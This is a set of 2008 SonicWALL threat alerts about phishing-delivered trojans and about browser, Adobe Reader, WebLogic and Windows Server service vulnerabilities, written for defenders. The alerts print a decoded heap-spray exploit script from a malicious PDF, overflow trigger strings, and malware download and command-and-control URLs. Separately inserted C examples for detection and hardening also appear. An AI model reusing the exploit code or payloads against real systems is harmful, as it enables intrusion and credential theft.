Bank of America Spam Trojan (Nov 25, 2008)

The SonicWALL UTM Research team observed a new Bank of America phishing campaign starting today, Tuesday, November 25, 2008. The e-mail pretends to be a service advertisement from Bank of America and contains a URL that leads to the demo video.

SonicWALL has received more than 1,000 e-mail copies of this phishing campaign today. The e-mail looks like the following:

Subject:

  • Bank of America – Demo Account
  • Bank of America – Demo Account Setup
  • Bank of America – Always Free Customer Service Demo Account, Try for FREE
  • Bank of America – full access privileges for your DEMO account

Email body:

screenshot

The URL in the e-mail points to a phishing page containing a Bank of America image. The image shows the Bank of America logo and displays the bank’s URL in the status bar when the user points at it. It also shows a video screen with a play button.

screenshot

When the user clicks, or after a few seconds of waiting, the page prompts the user to download the latest version of Adobe Flash Player 9 [Filename – Adobe_Player9.exe].

screenshot

The file that gets downloaded is a new Trojan downloader variant.

screenshot

When executed, the Trojan tries to connect to the silviocash.com domain and downloads a new Trojan [Filename – usp.exe] via HTTP.

At the time of writing this Alert, the AntiVirus detection rate for both malware executables was very low.

SonicWALL Gateway AntiVirus provides protection against these malware executables via GAV: Bofam (Trojan) and GAV: Bofam_2 (Trojan) signatures.

Opera Browser File URI Buffer Overflow (Nov 20, 2008)

Opera is a web browser similar to Microsoft Internet Explorer and Mozilla Firefox. It is capable of displaying web pages and executing web applications. It can also interpret and render many types of Internet content, including various versions of HTML, XML, CSS (Cascading Style Sheets), JavaScript, various graphic formats and so on. Opera is available for Windows, Macintosh, Unix and Linux based platforms.

The Uniform Resource Identifier (URI) scheme is a very common naming structure that Opera can parse. An example of a URI is http://www.sonicwall.com. URIs can be embedded into any HTML web page to link to other web pages.

There is a buffer overflow vulnerability in the Opera web browser. The vulnerability occurs when the browser tries to parse a very long URI that starts with file://. The string may overwrite a fixed-size heap-based buffer and corrupt memory, or even lead to the execution of injected code.

The SonicWALL UTM team has developed a signature to block attacks targeting this issue, listed below:

  • 3641 Opera Browser File URI Handling BO Attempt

There are also some existing signatures that can detect most of the suspicious shellcode in a web page, listed below. They will largely eliminate the possibility of attacks that try to inject and execute shellcode by exploiting this vulnerability.

  • 3124 Javascript Code Injection Attempt (Win/Linux)
  • 3127 Javascript Code Injection Attempt (Mac)
  • 4096 Mozilla Firefox Wrapped JavaScript Code Execution
  • 4665 Javascript Code Injection Attempt (Win/Linux) 2
  • 4701 Javascript Code Injection Attempt (Win/Linux) 3
  • 4744 Javascript Code Injection Attempt (Win/Linux) 4
  • 4760 Unicode Javascript Code Injection Attempt 1
  • 4761 Unicode Javascript Code Injection Attempt 2
  • 5051 Javascript Code Injection Attempt (Win/Linux) 5

Another article summarizing these JavaScript Code Injection signatures will follow soon.

UPS Invoice Spam (Nov 21, 2008)

The SonicWALL UTM Research team observed a new wave of the ongoing UPS invoice spam campaign starting Thursday, November 20, 2008. The e-mail has a zip-archived attachment which contains the new ZBot Trojan variant.

SonicWALL has received more than 1,000 e-mail copies of this malware to date. The e-mail looks like the following:

Attachment: UPSInfo.zip (contains UPSInfo.exe)

Subject: Your Tracking # [12-digit number]

Email Body:
————————
Sorry, we were not able to deliver postal package you sent on November the 1st in time because the recipient’s address is not correct.

Please print out the invoice copy attached and collect the package at our office. If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS
————————

The executable file inside the zip attachment has an icon disguised as an Adobe PDF file, and it looks like the following:

screenshot

When executed, the Trojan performs the following host-level activity:

  • Creates a directory twain_32 in C:\Documents and Settings\LocalService\Application Data and C:\WINDOWS\system32
  • Drops a copy of itself as C:\WINDOWS\system32\twext.exe
  • Creates two files C:\WINDOWS\system32\twain_32\local.ds and C:\WINDOWS\system32\twain_32\user.ds

It modifies the following Registry key to run twext.exe:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: “C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\twext.exe,”

It also tries to connect to and download an encrypted configuration file from the following URL:

  • pavelmoous.ru/pavel/conf.bin

The Trojan is also known as Trojan-Spy.Win32.Zbot.gsv [Kaspersky], W32/Trojan3.LA [F-Prot], and TR/Spy.ZBot.gsv [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GSV (Trojan) signature.

Airline Ticket Spam (Nov 14, 2008)

The SonicWALL UTM Research team observed a new spam campaign starting on Thursday, November 13, 2008, which involves a fake e-mail pretending to come from an airline company and to contain an airline ticket. The e-mail has a zip-archived attachment which contains the new Downloader Trojan.

The e-mail looks like the following:

Attachment: ticket.zip (contains ticket.doc .exe)

Subject:

  • Your flight ticket
  • Your ticket from Delta Airlines
  • Your ticket from Alaska Airlines
  • Your ticket from United Airlines
  • Your airplane ticket

Email Body:
————————
Dear Holder

Thank you for using our new service “Buy flight ticket Online” on our website. Your account has been created:

Your login: your-email-address
Your password: random-string

Your credit card has been charged for $WXX.YY (where W=4 and X,Y = 0-9)
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
Airline Name (E.g. United, Alaska etc)
————————

The executable file inside the zip attachment has an icon disguised as a Microsoft Word document, and it looks like the following:

screenshot

When executed, the Trojan performs the following host-level activity:

  • Creates a directory as C:\Program Files\Microsoft Common
  • Drops a copy of itself as C:\Program Files\Microsoft Common\wuauclt.exe
  • Deletes the original copy of the file
  • Creates multiple .sys files in the SYSTEM32\DRIVERS directory
  • Creates multiple .tmp files which are later deleted

It creates the following Registry key for itself:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger: “C:\Program Files\Microsoft Common\wuauclt.exe”

It also tries to connect to and download files from the following URLs:

  • furely.ru/load2/ld.php?v=[REMOVED]168650&n=1&uid=1 [Downloads msan1.exe – detected as GAV: Wigon.HE (Trojan)]
  • kexlup.ru/loadx/ld.php?v=[REMOVED]75168650&n=1&uid=1 [connection failed]

The Trojan is also known as Trojan.Win32.Agent.amzt [Kaspersky], W32/Trojan3.JD [F-Prot], and TR/Dldr.iBill.BP [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.AMZT (Trojan) signature [8,344 hits recorded].

MS08-069 MS XML Core Vulnerability (Nov 12, 2008)

Microsoft has released an advisory for its XML processing framework during this month’s Microsoft Patch Day. It is named MSXML or Microsoft XML Core services. The framework may be used by developers in third party applications as well as applications shipped with the operating system. The most popular application using this framework is Internet Explorer, which can transform XML files using XSL stylesheets.

The XML Core Services package contains the DOMDocument ActiveX object, which represents the top level of the XML source. Document Type Definition (DTD) is one of several SGML and XML schema languages that DOMDocument can parse. DOMDocument includes members for retrieving and creating all other XML objects. One of those member methods, loadXML, can load an XML document from a supplied string. The supplied string can reference an external DTD, which resides in a separate document and is referred to by the URI of the DTD file.

An information disclosure vulnerability exists in the DOMDocument ActiveX object control implementation. The flaw is due to a design weakness in the way XML Core Services handles error checks for external DTDs. Normally, content from one domain cannot access information from a different domain. However, the vulnerable versions of MSXML allow parameter entities in external DTDs to reference data on a different domain. Successful exploitation would disclose potentially confidential cross-domain information to the attacker.

To protect SonicWALL customers from attacks targeting this vulnerability, the SonicWALL UTM team created and released the following IPS signatures on the same day the advisory was released.

  • 1210 MS XML Core Services parseError Info Disclosure Attempt 2 (MS08-069)
  • 1209 MS XML Core Services parseError Info Disclosure Attempt 1 (MS08-069)

Adobe Reader util.printf Buffer Overflow (Nov 7, 2008)

Adobe Reader (formerly Acrobat Reader) is a ubiquitous application for viewing PDF (Portable Document Format) documents.

Since version 4.0, Acrobat includes JavaScript functionality allowing for customization and extensibility. Acrobat JavaScript is an extension of the core JavaScript which adds Acrobat-specific classes that enable the author to manage document related tasks. These classes include app, dbg, console, SOAP, ADBC, util, etc.

The util object provides the printf method, which takes a format string and the values to be formatted as arguments and returns the corresponding formatted string. For example:

   var num = 12345
   util.printf("%.2f", num)

This returns 12345.00.

A stack buffer overflow exists in Adobe Reader when it parses specially crafted PDF files. Specifically, the vulnerability is caused by a boundary error when parsing format strings containing a floating point specifier in the “util.printf()” JavaScript function. If the format string specifies a width for a floating point number, the code copies the padding spaces (0x20) to a fixed-length, stack-allocated buffer. Supplying an overly large width overflows the buffer with spaces and overwrites SEH. For example:

   var num = 1.2
   util.printf("%5000f", num)

This causes the byte 0x20 to be copied 5000 times on the stack and overflows the buffer.

An attacker can exploit this vulnerability by enticing a user to open a PDF document, which contains a malformed floating point specifier in the “util.printf()” JavaScript function. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

To evade detection, an attacker might use obfuscation techniques. For example, one of the PDF files exploiting this vulnerability contains the following FlateDecode stream:

The stream decodes to:

function main() {
    var sccs = unescape("%u03eb%ueb59%ue805%ufff8[…truncated]");
    var bgbl = unescape("%u0A0A%u0A0A");
    var slspc = 20 + sccs.length;
    while (bgbl.length < slspc) bgbl += bgbl;
    var fblk = bgbl.substring(0, slspc);
    var blk = bgbl.substring(0, bgbl.length - slspc);
    while (blk.length + slspc < 0x60000) blk = blk + blk + fblk;
    var mmy = new Array();
    for (i = 0; i < 1200; i++) { mmy[i] = blk + sccs }
    var nm = 12;
    for (i = 0; i < 18; i++) { nm = nm + "9"; }
    for (i = 0; i < 276; i++) { nm = nm + "8"; }
    util.printf("%45000f", nm);
    this.closeDoc(true);
}

app.setTimeOut("main()", 5000);

SonicWALL Gateway AntiVirus provides protection against this vulnerability via GAV: PDF.util.printf.AS (Exploit) and PDF.util.printf.AS_2 (Exploit) signatures.
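
A check an analyst can run over JavaScript already decoded from a PDF stream, flagging util.printf() calls whose literal format string asks for an oversized floating-point field width. This is an added example, not SonicWALL's signature logic or Adobe's fix; the function names and the 256-character alert threshold are assumptions, and a format string built at run time instead of written as a literal is not seen by it.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define WIDTH_LIMIT 256L      /* assumed alert threshold, not Adobe's buffer size */
#define WIDTH_CAP   1000000L  /* stop accumulating so long digit runs cannot overflow */

/* Largest field width attached to a floating-point conversion in fmt[0..n). */
long max_float_width(const char *fmt, size_t n)
{
    long best = 0;
    for (size_t i = 0; i < n; i++) {
        if (fmt[i] != '%') continue;
        size_t j = i + 1;
        if (j < n && fmt[j] == '%') { i = j; continue; }        /* literal "%%" */
        while (j < n && fmt[j] && strchr("+-#0, ", fmt[j])) j++; /* flags */
        long w = 0;
        while (j < n && isdigit((unsigned char)fmt[j])) {        /* width */
            if (w < WIDTH_CAP) w = w * 10 + (fmt[j] - '0');
            j++;
        }
        if (j < n && fmt[j] == '.') {                            /* precision */
            j++;
            while (j < n && isdigit((unsigned char)fmt[j])) j++;
        }
        if (j < n && fmt[j] && strchr("feEgG", fmt[j]) && w > best)
            best = w;                       /* only float conversions count */
        i = j - 1;                          /* resume at the conversion character */
    }
    return best;
}

/* Counts util.printf() calls in decoded JavaScript whose first argument is a
 * string literal requesting a float width above WIDTH_LIMIT. Escaped quotes
 * inside the literal are not handled. */
int count_wide_printf(const char *js)
{
    int hits = 0;
    const char *p = js;
    while ((p = strstr(p, "util.printf")) != NULL) {
        p += strlen("util.printf");
        while (isspace((unsigned char)*p)) p++;
        if (*p != '(') continue;
        p++;
        while (isspace((unsigned char)*p)) p++;
        if (*p != '"' && *p != '\'') continue;  /* non-literal: review by hand */
        char quote = *p++;
        const char *end = strchr(p, quote);
        if (!end) break;
        if (max_float_width(p, (size_t)(end - p)) > WIDTH_LIMIT) hits++;
        p = end + 1;
    }
    return hits;
}
```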

Obama Speech Trojan (Nov 5, 2008)

The SonicWALL UTM Research team observed a new spam campaign which uses yesterday’s US election as a social engineering mechanism to install a Trojan.

The e-mail appears to be from news@bbc.com with the subject “Priorities for the New President”. The e-mail content is:

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

  • Barack Obama wins
  • Can Obama win popular vote but lose election?
  • Did Obama Win Yet?
  • Election 2008: Time lapse of U.S. counties
  • Election Center 2008 – Election Results
  • Election Night Results
  • Fear of a Black President
  • Obama win an Electoral College majority
  • Obama win Defined by Race
  • USA Election 2008 Results
  • World Welcomes Obama’s Win

The link goes to one of these fast-fluxed domains: bfiinwach.com, gerimumsoe.com, lopbiuemis.com, vcoenutrmsi.com, wconlinenrue.com.

If the link is clicked, a file named Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed with the ASPACK executable packer. It drops itself as %Windir%\9129837.exe and drops a rootkit as %Windir%\new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry:

 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] ttool = "%Windir%\9129837.exe"

so that 9129837.exe runs every time Windows starts.

The Trojan then connects over HTTP to 91.203.93.57 (which is hosted in Ukraine) and issues the following GET requests:

  • cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
  • cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It exfiltrates stolen user IDs and passwords to the above IP address.

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Microsoft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan)

WebLogic Apache Connector Vulnerability (Oct 30, 2008)

Oracle BEA WebLogic Server is a multi-tier Java Application Server platform. In two- and three-tier application architectures, a web server receives forms or HTTP requests and passes them to application servers, which perform the actual processing. Connector software is the component the web server uses to communicate with the application server. Oracle BEA WebLogic Server ships with a connector, named mod_wl, for the Apache HTTP server.

Normally an HTTP POST request is sent in one stream, unless the HTTP header Transfer-Encoding is specified. A common value of the Transfer-Encoding header is “chunked”.

A buffer overflow vulnerability exists in Oracle BEA WebLogic Server’s connector software for the Apache HTTP server. Specifically, the vulnerability is due to improper parsing of HTTP Transfer-Encoding headers sent to the Apache web server. When a Transfer-Encoding header containing an unrecognized value is received, the connector software of WebLogic Server copies the header value into a fixed-size stack buffer using the sprintf() function. It has been observed that the vulnerable code does not verify the length of the string before copying it to the buffer.

A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request containing an overly long Transfer-Encoding value to the vulnerable WebLogic connector software. Successful exploitation would result in code injection and execution with the privileges of the service, normally “System” on the Windows platform.

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 3596 WEB-ATTACKS Transfer-Encoding HTTP Header BO Attempt
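
The inspection a gateway or the connector itself can apply before any header value is formatted into a buffer: check the Transfer-Encoding value's length first, then check every coding against a known list. This is an added example, not SonicWALL's signature or Oracle's patched code; the function names, the 64-byte cap, the list of accepted codings and the sample request builder are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TE_VALUE_LIMIT 64   /* assumed policy cap: real transfer codings are short tokens */

enum te_verdict { TE_ABSENT, TE_OK, TE_UNKNOWN, TE_OVERLONG };

/* Case-insensitive match of the n bytes at a against the C string b. */
static int ieq(const char *a, size_t n, const char *b)
{
    if (strlen(b) != n) return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Checks one header value: length first, then each comma-separated coding. */
static enum te_verdict check_value(const char *v, const char *end)
{
    static const char *known[] = { "chunked", "identity", "gzip", "compress", "deflate" };
    if ((size_t)(end - v) > TE_VALUE_LIMIT) return TE_OVERLONG;
    if (v == end) return TE_UNKNOWN;                   /* empty value */
    while (v < end) {
        const char *comma = memchr(v, ',', (size_t)(end - v));
        const char *tok_end = comma ? comma : end;
        while (v < tok_end && (*v == ' ' || *v == '\t')) v++;
        const char *t = tok_end;
        while (t > v && (t[-1] == ' ' || t[-1] == '\t')) t--;
        int ok = 0;
        for (size_t i = 0; i < sizeof known / sizeof known[0]; i++)
            ok |= ieq(v, (size_t)(t - v), known[i]);
        if (!ok) return TE_UNKNOWN;
        v = comma ? comma + 1 : end;
    }
    return TE_OK;
}

/* Walks the header block of a raw HTTP request and inspects Transfer-Encoding. */
enum te_verdict inspect_te(const char *req)
{
    const char *line = strstr(req, "\r\n");            /* end of the request line */
    while (line) {
        line += 2;
        if (*line == '\0' || strncmp(line, "\r\n", 2) == 0) break;  /* end of headers */
        const char *eol = strstr(line, "\r\n");
        const char *end = eol ? eol : line + strlen(line);
        const char *colon = memchr(line, ':', (size_t)(end - line));
        if (colon && ieq(line, (size_t)(colon - line), "transfer-encoding"))
            return check_value(colon + 1, end);
        line = eol;
    }
    return TE_ABSENT;
}

/* Constructed sample: a POST whose Transfer-Encoding value is n filler bytes. */
const char *sample_request(size_t n)
{
    static char buf[1024];
    int off = snprintf(buf, sizeof buf,
                       "POST /app HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: ");
    if (n > sizeof buf - (size_t)off - 5) n = sizeof buf - (size_t)off - 5;
    memset(buf + off, 'A', n);
    memcpy(buf + off + n, "\r\n\r\n", 5);              /* includes the terminating NUL */
    return buf;
}
```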

New ZBot Trojan variant (Oct 28, 2008)

The SonicWALL UTM Research team observed a new ZBot variant being spammed in the wild through an Angelina Jolie video spam campaign starting on Saturday, October 25, 2008. The campaign involves a fake e-mail message pretending to contain an Angelina Jolie video. The e-mail has a zip-archived attachment which contains the new ZBot variant.

SonicWALL has received more than 10,000 e-mail copies of this malware so far. The e-mail looks like the following:

Attachment: anjelina_video.zip (contains anjelina_video.exe)

Subject: New Anje1lna Jo1ie p0rn

Email Body:
————————
Anje1lna Jo1ie p0rn video, file attached, watch him
————————

Starting October 27, 2008, the spam campaign changed to “new eCard” spam, which involves a fake e-mail message pretending to contain an eCard. The e-mail has a zip-archived attachment which contains the new ZBot variant.

SonicWALL has received more than 5,000 e-mail copies of this malware so far. The e-mail looks like the following:

Attachment: ecard.zip (contains ecard.exe)

Subject: You have received an eCard

Email Body:
————————
Good day.

You have received an eCard
To pick up your eCard open attached file
We hope you enjoy you eCard.
Thank You!
————————

When executed, the Trojan drops the following malicious files in the Windows system folder:

  • twain_32\local.ds
  • twain_32\user.ds
  • twext.exe

It modifies the following registry key to ensure that twext.exe executes on system startup:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = “(System Folder Path)\userinit.exe,(System Folder Path)\twext.exe,”

It also tries to connect to the opokimoki.com domain and sends the following HTTP request:

  • GET /los/cfn.bf

The Trojan is also known as Trojan-Spy.Win32.Zbot.fql [Kaspersky], Troj/Agent-IAZ [Sophos], and TrojanSpy:Win32/Zbot.gen!C [Microsoft]

SonicWALL Gateway AntiVirus provided proactive protection against this new Zbot variant via GAV: Zbot.FME (Trojan) signature [809,401 hits recorded starting Oct 25, 2008].

screenshot

MS08-067 Server Service Buffer Overflow (Oct 23, 2008)

A vulnerability has been reported in the Server service of most versions of Microsoft Windows. This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers. These remote access facilities are often utilized for Remote Procedure Calls (RPC).

Calling RPC methods on a remote machine entails opening a named pipe as a file and accessing the RPC interface through a Universally Unique Identifier (UUID). Some Microsoft operating systems do not require authentication to access several named pipes. The srvsvc pipe is an alias to the ntsvcs named pipe and can be accessed by several other aliases. The srvsvc interface is registered with the UUID “4B324FC8-1670-01D3-1278-5A47BF6EE188”. The interface exposes a set of functions that enumerate and configure shares, sessions and other resources on the server. Two RPC functions that are provided by the SRVSVC interface are listed below:

  • NetprPathCanonicalize
  • NetprPathCompare

The function NetprPathCanonicalize, with opcode 31, normalizes a path name by converting slash characters to backslash characters and removing directory traversal sequences. Another RPC function, NetprPathCompare, with opcode 32, internally calls the NetprPathCanonicalize function to normalize path names before comparing them. Thus RPC calls to NetprPathCompare also invoke NetprPathCanonicalize.

The server-side implementation of the NetprPathCanonicalize RPC function is provided by the library NETAPI32.DLL. The calling syntax of this function is as follows:

long NetprPathCanonicalize(
    [in] [string] [unique] wchar_t *ServerName,
    [in] [string] [ref] wchar_t *PathName,
    [in] long OutBufLen,
    [in] [string] [ref] wchar_t *Prefix,
    [in] [out] [ref] long *PathType,
    [in] long PathFlags
);

A stack buffer overflow vulnerability exists in the way the Server service processes the PathName argument to the NetprPathCanonicalize function. The affected code fails to properly handle cases where directory traversal sequences result in traversing past the root path as in the following case:

/pathpart1/../../pathpart2

In such cases, the code internally copies the string, less the traversal sequence and the path which precedes it, into a calculated destination buffer. The destination buffer for the copied string is found by searching for the first slash character which precedes the traversal sequence. Normally, this ends up being the beginning of the source string, so normalizing the first traversal in the above example produces the following string:

/../pathpart2

Since the next traversal sequence to be normalized is not preceded by a path, the search for the first slash character preceding this sequence incorrectly ends up at a memory location in front of the designated buffer. As a result, if a slash character happens to exist on the stack in a vulnerable location, the source string will be copied into that location.

It has been observed that the attacker can manipulate the stack in a favourable way by calling the affected RPC function twice; the second time it is called, the copy will overwrite the designated stack buffer.

A remote attacker can exploit this vulnerability by sending specially crafted RPC requests to an affected system. Successful exploitation may result in execution of arbitrary code on the target host with System privileges. A denial of service condition may ensue in cases of unsuccessful attacks.
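
The backward search described above with its missing lower bound put back, as an added example (a constructed canonicalizer over narrow strings, not Microsoft's NETAPI32.DLL code). The function names and the 260-character buffer are assumptions; a ".." with no preceding component is rejected instead of searching in front of the buffer.

```c
#include <stddef.h>
#include <string.h>

#define CANON_MAX 260   /* assumed output buffer size for this example */

/* Converts '/' to '\\' and resolves "." and ".." components of `in` into `out`.
 * Returns 0 on success, -1 if the result does not fit or if a ".." would
 * climb above the root, which is the case the advisory describes. */
int canon_path(const char *in, char *out, size_t outlen)
{
    size_t o = 0;                         /* write index, never below 0 */
    const char *p = in;

    if (outlen < 2) return -1;
    while (*p) {
        while (*p == '/' || *p == '\\') p++;           /* skip separators */
        if (!*p) break;
        const char *e = p;                             /* find component end */
        while (*e && *e != '/' && *e != '\\') e++;
        size_t len = (size_t)(e - p);

        if (len == 1 && p[0] == '.') {
            /* "." refers to the current component: nothing to emit */
        } else if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (o == 0) return -1;        /* no preceding component: refuse */
            /* Back up to the previous separator. The o > 0 test is the
             * bound that keeps the search inside the buffer. */
            while (o > 0 && out[o - 1] != '\\') o--;
            o--;                          /* drop the separator itself */
        } else {
            if (o + 1 + len + 1 > outlen) return -1;   /* sep + name + NUL */
            out[o++] = '\\';
            memcpy(out + o, p, len);
            o += len;
        }
        p = e;
    }
    if (o == 0) out[o++] = '\\';          /* everything cancelled out: root */
    out[o] = '\0';
    return 0;
}

/* Convenience wrapper: canonical form in a static buffer, or NULL if rejected. */
const char *canon(const char *in)
{
    static char buf[CANON_MAX];
    return canon_path(in, buf, sizeof buf) == 0 ? buf : NULL;
}
```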

SonicWALL has released two signatures which will detect and block generic exploitation attempts of this vulnerability. The following IPS signatures have been deployed to address this issue:

  • 1160 – SRVSVC NetPathCanonicalize BO Attempt 1 (MS08-067)
  • 1161 – SRVSVC NetPathCanonicalize BO Attempt 2 (MS08-067)
  • 1174 – SRVSVC NetPathCanonicalize BO Attempt 3 (MS08-067)
  • 1178 – SRVSVC NetPathCanonicalize BO Attempt 4 (MS08-067)
  • 1186 – SRVSVC NetPathCanonicalize BO Exploit 1 (MS08-067)